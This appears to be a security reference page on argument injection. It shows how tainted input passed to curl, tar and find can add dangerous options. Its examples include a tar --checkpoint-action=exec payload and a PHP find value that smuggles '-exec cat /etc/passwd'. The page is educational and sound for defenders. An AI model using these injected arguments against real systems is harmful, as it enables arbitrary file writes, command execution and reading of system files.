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# Argument Injection
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Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
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It can happen in different situations, where you can only inject arguments to a command:
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- Improper sanitization (regex)
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- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
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- Bash expansion (ex: *)
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In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
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```
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from shlex import quote,split
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import sys
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import subprocess
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if __name__=="__main__":
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command = ['curl']
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command = command + split(sys.argv[1])
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print(command)
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r = subprocess.Popen(command)
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```
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It is possible for an attacker to pass several words to abuse options from ```curl``` command
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```
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python python_rce.py "https://www.google.fr -o test.py"
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```
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We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
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```
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['curl', 'https://www.google.fr', '-o', 'test.py']
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```
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## Summary
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* [List of exposed commands](#List of exposed commands)
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* [TAR](#TAR)
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* [CURL](#CURL)
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* [WGET](#WGET)
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* [References](#references)
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## List of exposed commands
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### CURL
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It is possible to abuse ```curl``` through the following options:
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```
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-o, --output <file> Write to file instead of stdout
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-O, --remote-name Write output to a file named as the remote file
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```
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In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
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### TAR
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For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
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Argument injection can happen into the '''extract''' command:
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```
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--to-command <command>
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--checkpoint=1 --checkpoint-action=exec=<command>
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-T <file> or --files-from <file>
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```
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Or in the '''create''' command:
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```
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-I=<program> or -I <program>
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--use-compres-program=<program>
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```
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There are also short options to work without spaces:
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```
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-T<file>
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-I"/path/to/exec"
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```
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### FIND
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Find some_file inside /tmp directory.
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```
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$file = "some_file";
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system("find /tmp -iname ".escapeshellcmd($file));
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```
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Print /etc/passwd content.
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```
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$file = "sth -or -exec cat /etc/passwd ; -quit";
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system("find /tmp -iname ".escapeshellcmd($file));
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```
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## References
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- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
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- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014] (https://www.exploit-db.com/papers/33930)
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- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018] (https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
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